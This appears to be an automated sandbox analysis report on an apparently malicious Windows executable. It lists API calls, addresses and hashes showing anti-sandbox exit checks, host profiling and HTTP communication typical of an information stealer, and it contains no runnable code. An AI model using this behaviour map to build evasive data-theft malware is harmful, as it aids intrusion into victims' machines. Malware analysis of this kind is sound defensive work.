25969->25972 25970->25969 25973 4f6688 25971->25973 25974 4f6675 GetProcAddress 25971->25974 25972->25971 25976 4f66a4 25973->25976 25977 4f6691 GetProcAddress 25973->25977 25974->25973 25975->25967 25978 4f66ad GetProcAddress GetProcAddress 25976->25978 25979 4f66d7 25976->25979 25977->25976 25978->25979 25979->25831 25981 4d105e VirtualAlloc 25980->25981 25982 4d1057 ExitProcess 25980->25982 25983 4d107d 25981->25983 25984 4d108a VirtualFree 25983->25984 25985 4d10b1 25983->25985 25984->25985 25986 4d10c0 25985->25986 
25987 4d10d0 GlobalMemoryStatusEx 25986->25987 25989 4d10f5 25987->25989 25990 4d1112 ExitProcess 25987->25990 25989->25990 25991 4d111a GetUserDefaultLangID 25989->25991 25991->25842 25991->25843 25993 4f2b24 25992->25993 25993->25846 25994->25866 26207 4f1820 25995->26207 25997 4f1b81 sscanf 26246 4d2a20 25997->26246 26000 4f1be9 26003 4effd0 26000->26003 26001 4f1bd6 26001->26000 26002 4f1be2 ExitProcess 26001->26002 26004 4effe0 26003->26004 26005 4f000d lstrcpy 26004->26005 26006 4f0019 lstrlen 26004->26006 26005->26006 26007 4f00d0 26006->26007 26008 4f00db lstrcpy 26007->26008 26009 4f00e7 lstrlen 26007->26009 26008->26009 26010 4f00ff 26009->26010 26011 4f010a lstrcpy 26010->26011 26012 4f0116 lstrlen 26010->26012 26011->26012 26013 4f012e 26012->26013 26014 4f0139 lstrcpy 26013->26014 26015 4f0145 26013->26015 26014->26015 26248 4f1570 26015->26248 26018 4f016e 26019 4f018f lstrlen 26018->26019 26020 4f0183 lstrcpy 26018->26020 26021 4f01a8 26019->26021 26020->26019 26022 4f01bd lstrcpy 26021->26022 26023 4f01c9 lstrlen 26021->26023 26022->26023 26024 4f01e8 26023->26024 26025 4f020c lstrlen 26024->26025 26026 4f0200 lstrcpy 26024->26026 26027 4f026a 26025->26027 26026->26025 26028 4f0282 lstrcpy 26027->26028 26029 4f028e 26027->26029 26028->26029 26258 4d2e70 26029->26258 26037 4f0540 26038 4f1570 4 API calls 26037->26038 26039 4f054f 26038->26039 26040 4f05a1 lstrlen 26039->26040 26041 4f0599 lstrcpy 26039->26041 26042 4f05bf 26040->26042 26041->26040 26043 4f05d1 lstrcpy lstrcat 26042->26043 26044 4f05e9 26042->26044 26043->26044 26045 4f0614 26044->26045 26046 4f060c lstrcpy 26044->26046 26047 4f061b lstrlen 26045->26047 26046->26045 26048 4f0636 26047->26048 26049 4f064a lstrcpy lstrcat 26048->26049 26050 4f0662 26048->26050 26049->26050 26051 4f0687 26050->26051 26052 4f067f lstrcpy 26050->26052 26053 4f068e lstrlen 26051->26053 26052->26051 26054 4f06b3 26053->26054 26055 4f06c7 lstrcpy lstrcat 26054->26055 26056 4f06db 26054->26056 26055->26056 
26057 4f0704 lstrcpy 26056->26057 26058 4f070c 26056->26058 26057->26058 26059 4f0749 lstrcpy 26058->26059 26060 4f0751 26058->26060 26059->26060 27014 4f2740 GetWindowsDirectoryA 26060->27014 26062 4f0785 27023 4d4c50 26062->27023 26063 4f075d 26063->26062 26064 4f077d lstrcpy 26063->26064 26064->26062 26066 4f078f 27177 4e8ca0 StrCmpCA 26066->27177 26068 4f079b 26069 4d1530 8 API calls 26068->26069 26070 4f07bc 26069->26070 26071 4f07ed 26070->26071 26072 4f07e5 lstrcpy 26070->26072 27195 4d60d0 80 API calls 26071->27195 26072->26071 26074 4f07fa 27196 4e81b0 10 API calls 26074->27196 26076 4f0809 26077 4d1530 8 API calls 26076->26077 26078 4f082f 26077->26078 26079 4f085e 26078->26079 26080 4f0856 lstrcpy 26078->26080 27197 4d60d0 80 API calls 26079->27197 26080->26079 26082 4f086b 27198 4e7ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 26082->27198 26084 4f0876 26085 4d1530 8 API calls 26084->26085 26086 4f08a1 26085->26086 26087 4f08c9 lstrcpy 26086->26087 26088 4f08d5 26086->26088 26087->26088 27199 4d60d0 80 API calls 26088->27199 26090 4f08db 27200 4e8050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 26090->27200 26092 4f08e6 26093 4d1530 8 API calls 26092->26093 26094 4f08f7 26093->26094 26095 4f092e 26094->26095 26096 4f0926 lstrcpy 26094->26096 27201 4d5640 8 API calls 26095->27201 26096->26095 26098 4f0933 26099 4d1530 8 API calls 26098->26099 26100 4f094c 26099->26100 27202 4e7280 1497 API calls 26100->27202 26102 4f099f 26103 4d1530 8 API calls 26102->26103 26104 4f09cf 26103->26104 26105 4f09fe 26104->26105 26106 4f09f6 lstrcpy 26104->26106 27203 4d60d0 80 API calls 26105->27203 26106->26105 26108 4f0a0b 27204 4e83e0 7 API calls 26108->27204 26110 4f0a18 26111 4d1530 8 API calls 26110->26111 26112 4f0a29 26111->26112 27205 4d24e0 230 API calls 26112->27205 26114 4f0a6b 26115 4f0a7f 26114->26115 26116 4f0b40 26114->26116 26117 4d1530 8 API calls 26115->26117 26118 4d1530 8 API calls 26116->26118 26119 4f0aa5 26117->26119 26121 4f0b59 26118->26121 26122 
Execution graph data (control-flow nodes and edges of a rendered graph; the graph layout itself is not recoverable from the extracted text). Addresses and Windows APIs recorded in this part of the graph:
• 4f0acc-4f0e95, 4f182e-4f1b08, 4f157f-4f1647, 4d1530-4d1699 and 4ef1b0-4eff21: string building and comparison via lstrcpy, lstrcat, lstrlen and StrCmpCA, with a Sleep call at 4efd60; 4d2a24: SystemTimeToFileTime (twice); several calls into helper routines summarized only by their API-call counts (4d60d0 80 API calls, 4ec840 70, 4e85b0 47, 4ed0f0 118, 4ed7b0 103, 4edfa0 149, 4ee500 108, 4ee720 120, 4ee9e0 110, 4d7bc0 153, 4eeb70 108, 4f41e0 91, 4f1660 12, 4eefb0 35, 4eee90 28, 4d1610 4)
• 4d2e82-4d4a4a: a long straight-line sequence of calls into 4d4a60 (2 API calls each); 4d4a76 RtlAllocateHeap, 4d4ab4 VirtualProtect
• 4f66e0-4f7177: repeated GetProcAddress resolution (4f6b94, 4f6cdb, 4f6f19, 4f6f96, 4f6fca, 4f70f6, 4f715b, 4f7177) interleaved with groups of unnamed API calls, continuing to 4f051f
• 4f278c: GetVolumeInformationA; 4f27ec: GetProcessHeap, RtlAllocateHeap; 4f2826: wsprintfA; 4f71fc: lstrcpy
• 4d4c70-4d55d8: lstrcpy; 4d4bd7: ??2@YAPAXI (three times), lstrlen, InternetCrackUrlA; 4d4dac: InternetOpenA, StrCmpCA; 4f3ed5: GetSystemTime; 4d5121: InternetConnectA; 4d5150: HttpOpenRequestA; 4d53b1: lstrlen, lstrlen, HttpSendRequestA, InternetReadFile; 4d547a: InternetReadFile; 4d549c/4d54b1: InternetCloseHandle; 4d54b8: InternetCloseHandle, CryptStringToBinaryA; 4d54e8: LocalAlloc; 4d54ff: CryptStringToBinaryA; 4d5517: LocalFree; 4d5529: lstrlen
• 4e8cc6-4e8ee2: ExitProcess, lstrlen, a series of StrCmpCA comparisons (4e8d84 through 4e8e6f), lstrcpy
• Standalone function summaries: 4f31f0 GetSystemInfo, wsprintfA; 4f4480 OpenProcess, GetModuleFileNameExA, CloseHandle, lstrcpy; 4f9711 MultiByteToWideChar (four times), __setmbcp; 4f2c10 GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation, wsprintfA; 4f30a0 GetSystemPowerStatus; 4f29a0 GetCurrentProcess, IsWow64Process; 4f3130 GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey; 4db309 98 API calls; 4e8c88 16 API calls; 4f2880 10 API calls; 4f3480 6 API calls; 4f3280 7 API calls; 4ddb99 671 API calls; 4e8615 47 API calls; 4e2499 290 API calls; 4f4e35 7 API calls; 4e4b29 303 API calls; 4e23a9 298 API calls; 4df639 144 API calls; 4d16b9 200 API calls; 4dbf39 177 API calls; 4eabb2 120 API calls
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D4C7F
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D4CD2
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D4D05
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D4D35
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D4D73
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D4DA6
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004D4DB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 4a4e03c62d6352186eaf276089c2d8911c2bf7230932717c46030085f9366bf9
                                • Instruction ID: 69020d0e2fabb66fb873ab170b9183a66ea9e72598d6aa961028510468d3359c
                                • Opcode Fuzzy Hash: 4a4e03c62d6352186eaf276089c2d8911c2bf7230932717c46030085f9366bf9
                                • Instruction Fuzzy Hash: A4527E71A0021A9BDB21EBA5DC59BAF77B5AF44304F04812BF905A7351DF7CAC41CBA8

                                Control-flow Graph: function 4f6390 (rendered graph omitted)
                                APIs
                                • GetProcAddress.KERNEL32(76210000,00CF1560), ref: 004F63E9
                                • GetProcAddress.KERNEL32(76210000,00CF1770), ref: 004F6402
                                • GetProcAddress.KERNEL32(76210000,00CF15A8), ref: 004F641A
                                • GetProcAddress.KERNEL32(76210000,00CF1500), ref: 004F6432
                                • GetProcAddress.KERNEL32(76210000,00CF91A0), ref: 004F644B
                                • GetProcAddress.KERNEL32(76210000,00CE6818), ref: 004F6463
                                • GetProcAddress.KERNEL32(76210000,00CE6558), ref: 004F647B
                                • GetProcAddress.KERNEL32(76210000,00CF16F8), ref: 004F6494
                                • GetProcAddress.KERNEL32(76210000,00CF1578), ref: 004F64AC
                                • GetProcAddress.KERNEL32(76210000,00CF1740), ref: 004F64C4
                                • GetProcAddress.KERNEL32(76210000,00CF15C0), ref: 004F64DD
                                • GetProcAddress.KERNEL32(76210000,00CE6678), ref: 004F64F5
                                • GetProcAddress.KERNEL32(76210000,00CF15D8), ref: 004F650D
                                • GetProcAddress.KERNEL32(76210000,00CF1788), ref: 004F6526
                                • GetProcAddress.KERNEL32(76210000,00CE6538), ref: 004F653E
                                • GetProcAddress.KERNEL32(76210000,00CF1758), ref: 004F6556
                                • GetProcAddress.KERNEL32(76210000,00CF1728), ref: 004F656F
                                • GetProcAddress.KERNEL32(76210000,00CE65D8), ref: 004F6587
                                • GetProcAddress.KERNEL32(76210000,00CF1848), ref: 004F659F
                                • GetProcAddress.KERNEL32(76210000,00CE66B8), ref: 004F65B8
                                • LoadLibraryA.KERNEL32(00CF1860,?,?,?,004F1C03), ref: 004F65C9
                                • LoadLibraryA.KERNEL32(00CF1878,?,?,?,004F1C03), ref: 004F65DB
                                • LoadLibraryA.KERNEL32(00CF1890,?,?,?,004F1C03), ref: 004F65ED
                                • LoadLibraryA.KERNEL32(00CF18A8,?,?,?,004F1C03), ref: 004F65FE
                                • LoadLibraryA.KERNEL32(00CF17E8,?,?,?,004F1C03), ref: 004F6610
                                • GetProcAddress.KERNEL32(75B30000,00CF1800), ref: 004F662D
                                • GetProcAddress.KERNEL32(751E0000,00CF1818), ref: 004F6649
                                • GetProcAddress.KERNEL32(751E0000,00CF1830), ref: 004F6661
                                • GetProcAddress.KERNEL32(76910000,00CF95C0), ref: 004F667D
                                • GetProcAddress.KERNEL32(75670000,00CE6698), ref: 004F6699
                                • GetProcAddress.KERNEL32(77310000,00CF9210), ref: 004F66B5
                                • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 004F66CC
                                Strings
                                • NtQueryInformationProcess, xrefs: 004F66C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: dae85a2a36fdad9be594dc3f6f909dd4e44656420838edb931c7350b18046ee2
                                • Instruction ID: 4b962c9f689c32943d9b5873100d90965267d96afb5b48f3e3ae4b747a98045f
                                • Opcode Fuzzy Hash: dae85a2a36fdad9be594dc3f6f909dd4e44656420838edb931c7350b18046ee2
                                • Instruction Fuzzy Hash: 8CA160B5611206DFD794DF64EC48A2637B9F788344700C71AEA95C3362EF7CA840DB69

                                Control-flow Graph: function 4f1bf0 (rendered graph omitted)
                                APIs
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF1560), ref: 004F63E9
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF1770), ref: 004F6402
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF15A8), ref: 004F641A
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF1500), ref: 004F6432
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF91A0), ref: 004F644B
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CE6818), ref: 004F6463
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CE6558), ref: 004F647B
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF16F8), ref: 004F6494
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF1578), ref: 004F64AC
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF1740), ref: 004F64C4
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF15C0), ref: 004F64DD
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CE6678), ref: 004F64F5
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF15D8), ref: 004F650D
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F1C2F
                                • ExitProcess.KERNEL32 ref: 004F1C67
                                • GetSystemInfo.KERNEL32(?), ref: 004F1C71
                                • ExitProcess.KERNEL32 ref: 004F1C7F
                                  • Part of subcall function 004D1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004D1046
                                  • Part of subcall function 004D1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 004D104D
                                  • Part of subcall function 004D1030: ExitProcess.KERNEL32 ref: 004D1058
                                  • Part of subcall function 004D10C0: GlobalMemoryStatusEx.KERNEL32 ref: 004D10EA
                                  • Part of subcall function 004D10C0: ExitProcess.KERNEL32 ref: 004D1114
                                • GetUserDefaultLangID.KERNEL32 ref: 004F1C8F
                                • ExitProcess.KERNEL32 ref: 004F1CB2
                                • ExitProcess.KERNEL32 ref: 004F1CE1
                                • lstrlen.KERNEL32(00CF9260), ref: 004F1CEE
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F1D15
                                • lstrcat.KERNEL32(00000000,00CF9260), ref: 004F1D1D
                                • lstrlen.KERNEL32(00504B98), ref: 004F1D28
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1D48
                                • lstrcat.KERNEL32(00000000,00504B98), ref: 004F1D54
                                • lstrlen.KERNEL32(00000000), ref: 004F1D63
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1D89
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F1D94
                                • lstrlen.KERNEL32(00504B98), ref: 004F1D9F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1DBC
                                • lstrcat.KERNEL32(00000000,00504B98), ref: 004F1DC8
                                • lstrlen.KERNEL32(00000000), ref: 004F1DD7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1DF9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F1E04
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                • String ID:
                                • API String ID: 3366406952-0
                                • Opcode ID: 5c07ac231f74c5aa1e7895a23ec053b9552400e7647729c21efe5c16c444af60
                                • Instruction ID: 485bda9c3c0d9d276c86ba6b482ecda9fbb06308d4cc5543419f17dc91ba7f13
                                • Opcode Fuzzy Hash: 5c07ac231f74c5aa1e7895a23ec053b9552400e7647729c21efe5c16c444af60
                                • Instruction Fuzzy Hash: 7471A33164021AEBDB20ABB1DD49B7F3A79AF50705F04811AFB46962B1DF7C9801CB6D

                                Control-flow Graph: function 4d6c40 (rendered graph omitted)
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D6C6F
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D6CC2
                                • InternetOpenA.WININET(004FCFEC,00000001,00000000,00000000,00000000), ref: 004D6CD5
                                • StrCmpCA.SHLWAPI(?,00CFF9E8), ref: 004D6CED
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004D6D15
                                • HttpOpenRequestA.WININET(00000000,GET,?,00CFF0A8,00000000,00000000,-00400100,00000000), ref: 004D6D50
                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004D6D77
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004D6D86
                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004D6DA5
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004D6DFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D6E5B
                                • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 004D6E7D
                                • InternetCloseHandle.WININET(00000000), ref: 004D6E8E
                                • InternetCloseHandle.WININET(?), ref: 004D6E98
                                • InternetCloseHandle.WININET(00000000), ref: 004D6EA2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D6EC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                • String ID: ERROR$GET
                                • API String ID: 3687753495-3591763792
                                • Opcode ID: 37d708a764bfedbbe4ecceb020fbbbb4357a9afe7ac538142d17a440d10e6b22
                                • Instruction ID: 74725a5d662788a9f1fede25c3ea769f345765cfe0f32422e9356770e684f37c
                                • Opcode Fuzzy Hash: 37d708a764bfedbbe4ecceb020fbbbb4357a9afe7ac538142d17a440d10e6b22
                                • Instruction Fuzzy Hash: C9819071B1021AABDB20DFA5DC55BAF77B8EF44700F11815AFA05E7381DB78AD048B98

                                Control-flow Graph: function 4d4a60 (rendered graph omitted)
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004D4AA3
                                • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 004D4BB0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-3329630956
                                • Opcode ID: 0c9e5b821777c04d3e596bd096541de6e39cfc4739df19914f185c74ba2758a5
                                • Instruction ID: 30acc71d64ec9274921abd173ea3d91efee2838824f93adaf0ac391e3e5711da
                                • Opcode Fuzzy Hash: 0c9e5b821777c04d3e596bd096541de6e39cfc4739df19914f185c74ba2758a5
                                • Instruction Fuzzy Hash: 5B31AFA9B8026D76D620FFEF4C47F5F6E55FF85BA0B028877B608571C0C9A15501CEA2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 004F2A6F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F2A76
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 004F2A8A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
